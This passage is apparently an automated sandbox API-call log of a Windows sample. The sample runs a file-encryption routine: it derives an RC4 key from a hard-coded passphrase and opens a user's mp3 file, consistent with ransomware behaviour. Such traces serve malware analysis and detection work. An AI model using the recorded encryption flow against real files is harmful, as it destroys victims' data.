lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0116.787] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8430 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0116.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0116.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0116.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0116.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0116.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0116.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0116.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0116.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca910, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0116.789] CloseHandle (hObject=0x298) returned 1 [0116.789] FreeLibrary (hLibModule=0x772d0000) returned 1 [0116.789] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0116.789] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\mzZHZq983SYlb.mp3", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec66c2c0, ftCreationTime.dwHighDateTime=0x1d5ec1a, ftLastAccessTime.dwLowDateTime=0x880af980, ftLastAccessTime.dwHighDateTime=0x1d5e79d, ftLastWriteTime.dwLowDateTime=0x880af980, ftLastWriteTime.dwHighDateTime=0x1d5e79d, nFileSizeHigh=0x0, nFileSizeLow=0x708a, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="mzZHZq983SYlb.mp3", cAlternateFileName="MZZHZQ~1.MP3")) returned 0x41ac780 [0116.790] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0116.790] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0116.790] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.790] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0116.790] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.790] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0116.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0116.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0116.790] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a4948) returned 1 [0116.791] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0116.791] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0116.791] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0116.791] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0116.791] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.791] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0116.791] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.791] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0116.791] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0116.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caf58, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0116.791] CryptCreateHash (in: hProv=0x41a4948, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0116.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0116.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0116.792] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0116.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0116.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0116.792] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0116.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caf70, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0116.792] CryptHashData (hHash=0x41ac740, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0116.854] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.854] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0116.854] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0116.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb060, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0116.854] CryptDeriveKey (in: hProv=0x41a4948, Algid=0x6610, hBaseData=0x41ac740, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac780) returned 1 [0116.855] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.855] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0116.855] CryptDestroyHash (hHash=0x41ac740) returned 1 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0328 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0116.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0116.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0116.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0116.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0116.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0116.856] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0116.856] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0116.856] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0116.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0116.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0116.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0116.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0116.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0116.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0116.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0116.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0116.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0116.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0116.856] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\mzZHZq983SYlb.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\mzzhzq983sylb.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0116.857] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.857] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0116.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0116.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0116.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0116.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0116.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0116.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0116.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0116.857] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0116.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0116.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0116.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0116.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0116.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0116.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0116.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0116.857] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0116.857] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0116.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0116.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0116.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0116.858] 